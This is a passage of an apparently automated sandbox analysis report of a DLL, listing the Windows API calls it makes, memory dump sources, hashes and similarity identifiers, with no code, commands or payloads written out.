                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                  • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                  • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1151147025-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                  • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                                    • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                  • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                                  • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2841959276-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                                  • _memset.LIBCMT ref: 10029DA5
                                                                                                                                    • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                                    • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                    • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                    • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2905758408-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3574576181-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                                  • String ID: Software\
                                                                                                                                  • API String ID: 3878845136-964853688
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32(?), ref: 1001AC38
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                                  • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                                  • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                                  • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                                  • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2853195852-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3219385341-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                                  • GetParent.USER32(?), ref: 1002A22C
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                                  • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                                  • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$LongParentVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 506644340-0
                                                                                                                                  • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                  • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                                  • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                                  • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                                  • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                                  • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                                  • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                                  • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                                    • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                    • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                                  • String ID: V&'
                                                                                                                                  • API String ID: 1067611704-802299783
                                                                                                                                  • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                  • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                                  • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                                  • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                                    • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2004563703-0
                                                                                                                                  • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                  • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                                  • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                                  • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                  • String ID: software
                                                                                                                                  • API String ID: 1740278721-2010147023
                                                                                                                                  • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                  • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                                  • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                                  • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                                    • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                                    • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                                  • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                                    • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                                    • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Task_impl$H_prolog3
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1204490572-0
                                                                                                                                  • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                  • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                                  • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                                  • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                                    • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                    • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                                  • _memset.LIBCMT ref: 10020AE2
                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 356813703-0
                                                                                                                                  • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                  • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                                  • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                                  • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Brush
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2798902688-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                                    • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                                    • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                                    • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 63617653-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                                  • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                                    • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                                  • _memset.LIBCMT ref: 1002D2F2
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4021759052-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 1002D5FF
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 1002D674
